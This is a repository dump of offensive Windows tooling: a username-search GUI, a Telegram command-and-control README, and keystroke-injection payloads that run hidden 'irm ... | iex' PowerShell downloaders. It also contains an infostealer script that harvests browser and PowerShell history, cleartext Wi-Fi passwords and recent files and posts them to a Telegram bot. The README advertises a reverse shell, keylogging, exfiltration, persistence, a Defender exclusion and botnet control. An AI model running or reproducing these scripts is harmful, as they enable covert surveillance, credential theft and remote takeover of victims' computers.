$OutputBox.Multiline = $True; 43 | $OutputBox.Location = New-Object System.Drawing.Size(20,110) 44 | $OutputBox.Width = 650 45 | $OutputBox.Height = 570 46 | $OutputBox.Scrollbars = "Vertical" 47 | $OutputBox.Font = 'Microsoft Sans Serif,12,style=Bold' 48 | 49 | $DecodeBT = New-Object System.Windows.Forms.Button 50 | $DecodeBT.Text = "Start Search" 51 | $DecodeBT.Width = 150 52 | $DecodeBT.Height = 35 53 | $DecodeBT.Location = New-Object System.Drawing.Point(520, 30) 54 | $DecodeBT.Font = 'Microsoft Sans Serif,10,style=Bold' 55 | $DecodeBT.BackColor = "#eeeeee" 56 | $DecodeBT.add_MouseHover($showhelp) 57 | $DecodeBT.name="decode" 58 | 59 | $MainWindow.controls.AddRange(@($TextInput,$DecodeBT,$OutputBox,$TextInputHeader,$OutputBoxHeader)) 60 | 61 | 62 | $DecodeBT.Add_Click({ 63 | 64 | Function Add-OutputBoxLine{ 65 | Param ($outfeed) 66 | $OutputBox.AppendText("`r`n$outfeed") 67 | $OutputBox.Refresh() 68 | $OutputBox.ScrollToCaret() 69 | } 70 | 71 | 72 | $myArray = @( 73 | "https://twitter.com/$userhandle", 74 | "https://www.instagram.com/$userhandle/", 75 | "https://ws2.kik.com/user/$userhandle/", 76 | "https://medium.com/@$userhandle", 77 | "https://pastebin.com/u/$userhandle/", 78 | "https://www.patreon.com/$userhandle/", 79 | "https://photobucket.com/user/$userhandle/library", 80 | "https://www.pinterest.com/$userhandle/", 81 | "https://myspace.com/$userhandle/", 82 | "https://www.reddit.com/user/$userhandle/" 83 | "https://2Dimensions.com/a/$userhandle" 84 | "https://www.7cups.com/@$userhandle" 85 | "https://www.9gag.com/u/$userhandle" 86 | "https://about.me/$userhandle" 87 | "https://independent.academia.edu/$userhandle" 88 | "https://www.alik.cz/u/$userhandle" 89 | "https://www.alltrails.com/members/$userhandle" 90 | "https://www.anobii.com/$userhandle/profile" 91 | "https://discussions.apple.com/profile/$userhandle" 92 | "https://archive.org/details/@$userhandle" 93 | "https://asciinema.org/~$userhandle" 94 | "https://ask.fm/$userhandle" 95 | "https://discuss.atom.io/u/$userhandle/summary" 96 | "https://audiojungle.net/user/$userhandle" 97 | "https://www.avizo.cz/$userhandle/" 98 | "https://blip.fm/$userhandle" 99 | "https://$userhandle.booth.pm/" 100 | "https://www.behance.net/$userhandle" 101 | "https://binarysearch.io/@/$userhandle" 102 | "https://bitbucket.org/$userhandle/" 103 | "https://$userhandle.blogspot.com" 104 | "https://bodyspace.bodybuilding.com/$userhandle" 105 | "https://www.bookcrossing.com/mybookshelf/$userhandle/" 106 | "https://buzzfeed.com/$userhandle" 107 | "https://www.cnet.com/profiles/$userhandle/" 108 | "https://$userhandle.carbonmade.com" 109 | "https://career.habr.com/$userhandle" 110 | "https://beta.cent.co/@$userhandle" 111 | "https://www.championat.com/user/$userhandle" 112 | "https://www.chess.com/member/$userhandle" 113 | "https://www.cloob.com/name/$userhandle" 114 | "https://community.cloudflare.com/u/$userhandle" 115 | "https://www.codecademy.com/profiles/$userhandle" 116 | "https://www.codechef.com/users/$userhandle" 117 | "https://www.codewars.com/users/$userhandle" 118 | "https://www.colourlovers.com/lover/$userhandle" 119 | "https://www.coroflot.com/$userhandle" 120 | "https://www.countable.us/$userhandle" 121 | "https://www.cracked.com/members/$userhandle/" 122 | "https://$userhandle.crevado.com" 123 | "https://dev.to/$userhandleali" 124 | "https://www.dailymotion.com/$userhandle" 125 | "https://www.designspiration.net/$userhandle/" 126 | "https://$userhandle.deviantart.com" 127 | "https://www.discogs.com/user/$userhandle" 128 | "https://discuss.elastic.co/u/$userhandle" 129 | "https://disqus.com/$userhandle" 130 | "https://dribbble.com/$userhandle" 131 | "https://www.duolingo.com/profile/$userhandle" 132 | "https://ello.co/$userhandle" 133 | "https://euw.op.gg/summoner/userName=$userhandle" 134 | "https://www.eyeem.com/u/$userhandle" 135 | "https://f3.cool/$userhandle/" 136 | "https://www.facebook.com/$userhandle" 137 | "https://facenama.com/$userhandle" 138 | "https://www.flickr.com/people/$userhandle" 139 | "https://flipboard.com/@$userhandle" 140 | "https://fortnitetracker.com/profile/all/$userhandle" 141 | "https://freelance.habr.com/freelancers/$userhandle" 142 | "https://www.freelancer.com/api/users/0.1/users?usernames%5B%5D=$userhandle&compact=true" 143 | "https://freesound.org/people/$userhandle/" 144 | "https://www.gamespot.com/profile/$userhandle/" 145 | "https://giphy.com/$userhandle" 146 | "https://www.github.com/$userhandle" 147 | "https://gitlab.com/$userhandle" 148 | "https://gitee.com/$userhandle" 149 | "http://en.gravatar.com/$userhandle" 150 | "https://www.gumroad.com/$userhandle" 151 | "https://gurushots.com/$userhandle/photos" 152 | "https://hackaday.io/$userhandle" 153 | "https://news.ycombinator.com/user?id=$userhandle" 154 | "https://hackerone.com/$userhandle" 155 | "https://hackerrank.com/$userhandle" 156 | "https://www.house-mixes.com/profile/$userhandle" 157 | "https://icq.im/$userhandle" 158 | "https://www.ifttt.com/p/$userhandle" 159 | "https://www.instructables.com/member/$userhandle" 160 | "https://$userhandle.itch.io/" 161 | "https://$userhandle.jimdosite.com" 162 | "https://forums.kali.org/member.php?username=$userhandle" 163 | "https://keybase.io/$userhandle" 164 | "https://kik.me/$userhandle" 165 | "https://www.linux.org.ru/people/$userhandle/profile" 166 | "https://launchpad.net/~$userhandle" 167 | "https://leetcode.com/$userhandle" 168 | "https://letterboxd.com/$userhandle" 169 | "https://lichess.org/@/$userhandle" 170 | "https://$userhandle.livejournal.com" 171 | "https://www.liveleak.com/c/$userhandle" 172 | "https://lolchess.gg/profile/na/$userhandle" 173 | "https://www.memrise.com/user/$userhandle/" 174 | "https://www.mixcloud.com/$userhandle/" 175 | "https://www.munzee.com/m/$userhandle" 176 | "https://myanimelist.net/profile/$userhandle" 177 | "https://www.myminifactory.com/users/$userhandle" 178 | "https://myspace.com/$userhandle" 179 | "https://www.native-instruments.com/forum/members?username=$userhandle" 180 | "https://namemc.com/profile/$userhandle" 181 | "https://blog.naver.com/$userhandle" 182 | "https://$userhandle.newgrounds.com" 183 | "https://notabug.org/$userhandle" 184 | "https://www.openstreetmap.org/user/$userhandle" 185 | "https://opensource.com/users/$userhandle" 186 | "https://forums.pcgamer.com/members/?username=$userhandle" 187 | "https://packagist.org/packages/$userhandle/" 188 | "https://pastebin.com/u/$userhandle" 189 | "https://www.patreon.com/$userhandle" 190 | "https://www.periscope.tv/$userhandle/" 191 | "https://www.pinkbike.com/u/$userhandle/" 192 | "https://www.pinterest.com/$userhandle/" 193 | "https://plug.dj/@/$userhandle" 194 | "https://polarsteps.com/$userhandle" 195 | "https://www.producthunt.com/@$userhandle" 196 | "http://promodj.com/$userhandle" 197 | "https://pypi.org/user/$userhandle" 198 | "https://quizlet.com/$userhandle" 199 | "https://raidforums.com/User-$userhandle" 200 | "https://www.reddit.com/user/$userhandle" 201 | "https://repl.it/@$userhandle" 202 | "https://www.reverbnation.com/$userhandle" 203 | "https://rubygems.org/profiles/$userhandle" 204 | "https://www.scribd.com/$userhandle" 205 | "https://$userhandle.slack.com" 206 | "https://slashdot.org/~$userhandle" 207 | "https://slideshare.net/$userhandle" 208 | "https://soundcloud.com/$userhandle" 209 | "https://sourceforge.net/u/$userhandle" 210 | "https://www.sparkpeople.com/mypage.asp?id=$userhandle" 211 | "https://speedrun.com/user/$userhandle" 212 | "https://www.sporcle.com/user/$userhandle/people" 213 | "https://open.spotify.com/user/$userhandle" 214 | "https://robertsspaceindustries.com/citizens/$userhandle" 215 | "https://steamcommunity.com/id/$userhandle" 216 | "https://steamcommunity.com/groups/$userhandle" 217 | "https://steamid.uk/profile/$userhandle" 218 | "https://www.strava.com/athletes/$userhandle" 219 | "https://forum.sublimetext.com/u/$userhandle" 220 | "https://ch.tetr.io/u/$userhandle" 221 | "https://tellonym.me/$userhandle" 222 | "https://tiktok.com/@$userhandle" 223 | "https://www.gotinder.com/@$userhandle" 224 | "http://en.tm-ladder.com/$userhandle_rech.php" 225 | "https://www.tradingview.com/u/$userhandle/" 226 | "https://trello.com/$userhandle" 227 | "https://tripadvisor.com/members/$userhandle" 228 | "https://tryhackme.com/p/$userhandle" 229 | "https://www.twitch.tv/$userhandle" 230 | "https://ultimate-guitar.com/u/$userhandle" 231 | "https://unsplash.com/@$userhandle" 232 | "https://vsco.co/$userhandle" 233 | "https://forum.velomania.ru/member.php?username=$userhandle" 234 | "https://vero.co/$userhandle" 235 | "https://vimeo.com/$userhandle" 236 | "https://virgool.io/@$userhandle" 237 | "https://www.virustotal.com/ui/users/$userhandle/trusted_users" 238 | "https://www.warriorforum.com/members/$userhandle.html" 239 | "https://weheartit.com/$userhandle" 240 | "https://$userhandle.webnode.cz/" 241 | "http://www.wikidot.com/user:info/$userhandle" 242 | "https://www.wikipedia.org/wiki/User:$userhandle" 243 | "https://community.windy.com/user/$userhandle" 244 | "https://profiles.wordpress.org/$userhandle/" 245 | "https://xboxgamertag.com/search/$userhandle" 246 | "https://www.younow.com/$userhandle/" 247 | "https://youpic.com/photographer/$userhandle/" 248 | "https://www.youtube.com/$userhandle" 249 | "https://www.zhihu.com/people/$userhandle" 250 | "https://akniga.org/profile/$userhandle" 251 | "https://allmylinks.com/$userhandle" 252 | "https://aminoapps.com/u/$userhandle" 253 | "http://www.authorstream.com/$userhandle/" 254 | "https://www.couchsurfing.com/people/$userhandle" 255 | "https://www.geocaching.com/p/default.aspx?u=$userhandle" 256 | "https://gfycat.com/@$userhandle" 257 | "https://www.hackster.io/$userhandle" 258 | "https://www.interpals.net/$userhandle" 259 | "http://www.jeuxvideo.com/profil/$userhandle?mode=infos" 260 | "https://last.fm/user/$userhandle" 261 | "https://forum.leasehackr.com/u/$userhandle/summary/" 262 | "https://www.livelib.ru/reader/$userhandle" 263 | "https://mastodon.cloud/@$userhandle" 264 | "https://mastodon.social/@$userhandle" 265 | "https://mastodon.technology/@$userhandle" 266 | "https://mastodon.xyz/@$userhandle" 267 | "https://www.mercadolivre.com.br/perfil/$userhandle" 268 | "https://www.metacritic.com/user/$userhandle" 269 | "https://mstdn.io/@$userhandle" 270 | "https://www.nairaland.com/$userhandle" 271 | "https://note.com/$userhandle" 272 | "https://www.npmjs.com/~$userhandle" 273 | "https://osu.ppy.sh/users/$userhandle" 274 | "https://php.ru/forum/members/?username=$userhandle" 275 | "https://pr0gramm.com/user/$userhandle" 276 | "https://social.tchncs.de/@$userhandle" 277 | "http://uid.me/$userhandle" 278 | ) 279 | 280 | $userhandle = $TextInput.Text 281 | Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------" 282 | Add-OutputBoxLine -outfeed "Searching Username:$userhandle Against Known Websites List..." 283 | Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------" 284 | 285 | foreach ($i in $myArray) { 286 | try{ 287 | $response = Inv`o`ke-`W`ebR`e`qu`e`st -Uri "$i" -ErrorAction Stop 288 | $StatusCode = $Response.StatusCode 289 | }catch{$StatusCode = $_.Exception.Response.StatusCode.value__} 290 | if ($StatusCode -eq "200"){ 291 | Add-OutputBoxLine -outfeed "Found one: $i$userhandle" 292 | }if ($StatusCode -eq "404"){}else {}} 293 | 294 | }) 295 | 296 | 297 | 298 | $MainWindow.ShowDialog() | Out-Null 299 | exit -------------------------------------------------------------------------------- /Fast-Execution/Telegram-C2/README.md: -------------------------------------------------------------------------------- 1 | # Beigeworm's Telegram C2 Client 2 | 3 | MAIN SCRIPT HERE - https://github.com/beigeworm/PoshGram-C2 4 | 5 | **SYNOPSIS** 6 | ------------- 7 | 8 | Using a Telegram Bot's Chat to Act as a Command and Control Server. 9 | 10 | Telegram Bots are able to both receive AND send messages. so can you use it as a C2 Server? 11 | 12 | ----------------------------------------------------------------------------------------------------------------------------- 13 | 14 | **INFORMATION** 15 | --------------- 16 | 17 | This script will wait until it is called in the Telegram chat by it's host computer name (eg. DESKTOP-WG65HY). Then Click 'Enter Commands' or 'Options' to begin the session and accept commands from Telegram chat. 18 | 19 | During a connected session, A list of Modules can be accessed by typing 'options' in chat. Or you can use the chat to act simply as a reverse shell with standard PowerShell commands. 20 | 21 | ----------------------------------------------------------------------------------------------------------------------------- 22 | 23 | Confirmed working with no Microsoft AV detections, on a variety of Windows systems over a week or so of testing 14/08/23 24 | 25 | *(Win 10 Laptop, Win 11 Laptop, 2 Win 11 Desktops, 2 Win10 Desktops, Win 10 VM, AtlasOS Win 10 Laptop. ReviOS Win 10 Macbook w/ Bootcamp) will add more in future...* 26 | 27 | ----------------------------------------------------------------------------------------------------------------------------- 28 | 29 | **FEATURES** 30 | ------------- 31 | 32 | **Session Queue** - While running, this script waits for a start phrase (the computer name) before connecting, allowing multiple computers to wait for interaction. 33 | 34 | **Botnet Mode** - Add simultaneous sessions to control multiple computers at once. (enter computer names one after the other into chat) 35 | 36 | **Persistance** - Can add itself to startup folder (RemovePersistance command will undo this) 37 | 38 | **Auto Update** - The script checks for a newer version and updates if neccecary. 39 | 40 | **Options List** - Once connected type "Options" to see a list of operations. ("ExtraInfo" will show more command info) 41 | 42 | **Pause Session** - exits the current session and script waits for re-authrentication. 43 | 44 | **Key Capture Standby** - only sends messages if keys are pressed and remains idle otherwise. 45 | 46 | **File Size Intellegence** - Auto split Uploads over 50mb. 47 | 48 | **Privilege Escalation** - The ability to send the user a UAC prompt for this script and restart if succesful. 49 | 50 | **Toggle Error Messaging** - Turn On or Off returning error messages to the chat. (Off by default) 51 | 52 | **Reverse shell** - apart from running the modules, once connected the chat can act as a reverse shell. 53 | 54 | **Killswitch** - Any Modules such as "KeyCapture" and "Exfiltrate" can be killed by typing "KILL" into chat 55 | (this returns the session so it can accept further commands (does not kill the current session.)) 56 | 57 | ----------------------------------------------------------------------------------------------------------------------------- 58 | 59 | **TELEGRAM SETUP INSTRUCTIONS** 60 | ---------------------- 61 | 1. Install Telegram and make an account if you haven't already. 62 | 63 | 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 64 | 65 | 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 66 | 67 | 4. At the start off the the Script - Replace `$tg` with your Telegram Bot API Token (only when running ps1 directly (not changed using Flipper, VBScript etc as it should be pre-defined there.. eg. `$tg = 'TOKEN'`)) 68 | 69 | 5. Run the script on target system 70 | 71 | 6. Check telegram chat for 'waiting to connect' message. 72 | 73 | 7. This script has a feature to wait until you start the session from Telegram. 74 | 75 | 8. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer's session. 76 | 77 | ----------------------------------------------------------------------------------------------------------------------------- 78 | 79 | **MODULES INFORMATION** 80 | ----------------------- 81 | 82 | `Options` : Show a menu in chat listing all the below functions 83 | 84 | `Kill` : Killswitch for `Key-Capture` and `Exfiltrate` commands (can take a few seconds to kill.) 85 | 86 | `Extra-Info` : Extra command information and examples sent to the chat 87 | 88 | `Close` : Close the Session completely 89 | 90 | `Pause-Session` : Pauses the session (to reconnect type in the computer name again) 91 | 92 | `Toggle-Errors` : Toggle error messages to the chat ON or OFF and returns the current state to chat 93 | 94 | `Folder-Tree` : Gets Directory trees for User folders and sends it zipped to the chat 95 | 96 | `SpeechToText` : Send audio transcript to Discord 97 | 98 | `Screenshot` : Sends a screenshot of the desktop as a png file 99 | 100 | `Key-capture` : Capture Keystrokes and send them (collected keystrokes are only sent after 10 seconds of keyboard inactivity) 101 | 102 | `System-info` : Send System info as text file (system, user, hardware, ip information and more) 103 | 104 | `Enumerate-LAN` : find info on other network devices (IPv4, MAC address, Hostname, Manufacturer) (eg. `Enumerate-LAN -prefix 192.168.1`) 105 | 106 | `Add-Persistance` : Add Telegram C2 to Startup (Copy the script to a default windows location and a vbs script to the startup folder) 107 | 108 | `Remove-Persistance` : Remove Startup Persistance (Remove the ps1 script and vbs file) 109 | 110 | `Is-Admin` : Checks if session has admin Privileges and returns the result 111 | 112 | `Attempt-Elevate` : Send user a prompt to grant Administrator privilages in a new session. (if the user accepts the prompt) 113 | 114 | `Message` : Send a message in a pop-up window to connected computer `Message "Your Message Here!"` 115 | 116 | `Take-Picture` : Take a picture with any connected camera/webcam and upload to chat. 117 | 118 | `Record-Audio` : Record microphone to mp3 file and upload to chat. eg. `Record-Audio -t 100` in seconds 119 | 120 | `Record-Screen` : Record Screen to mkv file and upload to chat. eg. `Record-Screen -t 100` in seconds 121 | 122 | `Nearby-Wifi` : Show nearby wifi networks 123 | 124 | `Send-Hydra` : Never ending popups (use killswitch) 125 | 126 | `Exfiltrate` : Searches for, and sends, files to the chat as zip files split into 50mb each (Telegram max upload limit.) 127 | 128 | EXFILTRATION EXAMPLE COMMAND = `Exfiltrate -path [FOLDERS] -filetype [FILETYPES]` 129 | 130 | FOLDERS = Documents, Desktop, Downloads, OneDrive, Pictures, Videos 131 | 132 | FILETYPES = log, db, txt, doc, pdf, jpg, jpeg, png, wdoc, xdoc, cer, key, xls, xlsx, cfg, conf, docx, rft 133 | 134 | **ADMIN ONLY FUNCTIONS** 135 | 136 | `Disable-AV` : Attempt to exclude C:/ from Defender Scanning (Crude disable method) 137 | 138 | `Disable-HID` : Disable Mice and Keyboards on the target system 139 | 140 | `Enable-HID` : Enable Mice and Keyboards on the target system 141 | 142 | *(Commands are not case sensitive)* 143 | 144 | ----------------------------------------------------------------------------------------------------------------------------- 145 | 146 | Builder GUI example 147 | ![Screenshot_1](https://github.com/beigeworm/Powershell-Tools-and-Toys/assets/93350544/5424ba95-d4bd-4667-a2b5-cf681f049698) 148 | 149 | Telegram Chat example 150 | ![telec2](https://github.com/beigeworm/Powershell-Tools-and-Toys/assets/93350544/58ec957d-4792-4d5a-9f06-ced4ccc3408d) 151 | o 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. -------------------------------------------------------------------------------- /Fast-Execution/Telegram-C2/Telegram C2 Client.js: -------------------------------------------------------------------------------- 1 | 2 | // Title: beigeworm's Telegram Command And Control. 3 | // Author: @beigeworm 4 | // Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform. 5 | // Target: Windows 10 and 11 6 | // SETUP INSTRUCTIONS 7 | // 1. visit https://t.me/botfather and make a bot. 8 | // 2. add bot api to script. 9 | // 3. search for bot in top left box in telegram and start a chat then type /start. 10 | // 5. Run Script on target System 11 | // 6. Check telegram chat for 'waiting to connect' message. 12 | // 7. this script has a feature to wait until you start the session from telegram. 13 | // 8. type in the computer name from that message into telegram bot chat to connect to that computer. 14 | // 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token 15 | 16 | // script setup 17 | layout("us") 18 | 19 | // Open Powershell and download script 20 | delay(1000); 21 | press("GUI r"); 22 | delay(1000); 23 | type("powershell -NoP -NonI -Ep Bypass -W H -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex"); 24 | delay(500); 25 | press("ENTER"); 26 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Telegram System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Telegram Bot Chat with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace YOUR_BOT_TOKEN_FOR_TELEGRAM with your bot token 14 | 5. Run Script on target System 15 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Infostealer/System-Info-to-Telegram.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's system information to Telegram Bot 2 | // Author: @beigeworm 3 | // Description: This script gathers system information and posts to Telegram Bot Chat with the results. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace BOT_TOKEN with your Telegram bot token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Telegram-Infostealer/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Infostealer/main.ps1: -------------------------------------------------------------------------------- 1 | $token= "$tg" 2 | $apiUrl = "https://api.telegram.org/bot$Token/sendMessage" 3 | $URL = 'https://api.telegram.org/bot{0}' -f $Token 4 | 5 | while($chatID.length -eq 0){ 6 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 7 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 8 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 9 | Sleep 10 10 | } 11 | 12 | $charCodes = @(0x2705, 0x1F4BB, 0x274C, 0x1F55C, 0x1F50D, 0x1F517, 0x23F8) 13 | $chars = $charCodes | ForEach-Object { [char]::ConvertFromUtf32($_) } 14 | $tick, $comp, $closed, $waiting, $glass, $cmde, $pause = $chars 15 | Function Post-Message{$script:params = @{chat_id = $ChatID ;text = $contents};Invoke-RestMethod -Uri $apiUrl -Method POST -Body $params} 16 | Function Post-File{curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null} 17 | 18 | 19 | $contents = "$comp Gathering System Information for $env:COMPUTERNAME $comp" 20 | Post-Message 21 | $userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") 22 | $email = (Get-ComputerInfo).WindowsRegisteredOwner 23 | $systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name 24 | $userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] 25 | $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content 26 | $systemInfo = Get-WmiObject -Class Win32_OperatingSystem 27 | $ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion 28 | $processorInfo = Get-WmiObject -Class Win32_Processor 29 | $computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem 30 | $userInfo = Get-WmiObject -Class Win32_UserAccount 31 | $videocardinfo = Get-WmiObject Win32_VideoController 32 | $Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("") 33 | $RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} 34 | $users = "$($userInfo.Name)" 35 | $userString = "`nFull Name : $($userInfo.FullName)" 36 | $OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)" 37 | $systemString = "Processor : $($processorInfo.Name)" 38 | $systemString += "`nMemory : $RamInfo" 39 | $systemString += "`nGpu : $($videocardinfo.Name)" 40 | $systemString += "`nStorage : $Hddinfo" 41 | $COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table 42 | $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine 43 | $service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'} 44 | $software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize 45 | $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion 46 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 47 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 48 | $Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 49 | $Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 50 | $Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique 51 | $Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 52 | $pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw 53 | $FilePath = "$env:temp\systeminfo.txt" 54 | $outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){ 55 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()} 56 | $pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;} 57 | $RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime 58 | $contents = "======================================================== 59 | 60 | Current User : $env:USERNAME 61 | Email Address : $email 62 | Language : $systemLanguage 63 | Keyboard Layout : $keyboardLayoutID 64 | Other Accounts : $users 65 | Public IP : $computerPubIP 66 | Current OS : $OSString 67 | Build : $ver 68 | Hardware Info 69 | -------------------------------------------------------- 70 | $systemString" 71 | "--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $FilePath -Encoding ASCII 72 | "General Info `n $contents" | Out-File -FilePath $FilePath -Encoding ASCII -Append 73 | "Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $FilePath -Encoding ASCII -Append 74 | "USB Info `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 75 | ($COMDevices| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 76 | "`n" | Out-File -FilePath $FilePath -Encoding ASCII -Append 77 | "SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $FilePath -Encoding ASCII -Append 78 | "Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 79 | ($software| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 80 | "Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 81 | ($process| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 82 | "Services `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 83 | ($service| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 84 | "Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath $FilePath -Encoding ASCII -Append 85 | "`n" | Out-File -FilePath $FilePath -Encoding ASCII -Append 86 | "HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $FilePath -Encoding ASCII -Append 87 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 88 | ($Value| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 89 | ($Value2| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 90 | "Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 91 | ($pshistory| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 92 | "Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 93 | ($RecentFiles | Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 94 | Post-Message 95 | Post-File ;rm -Path $FilePath -Force 96 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Keylogger/Keylogger-to-Telegram.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Keyloggger to Telegram Chat. 2 | // Author: @beigeworm 3 | // Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace TOKEN_HERE with your Telegram token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Telegram-Keylogger/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- 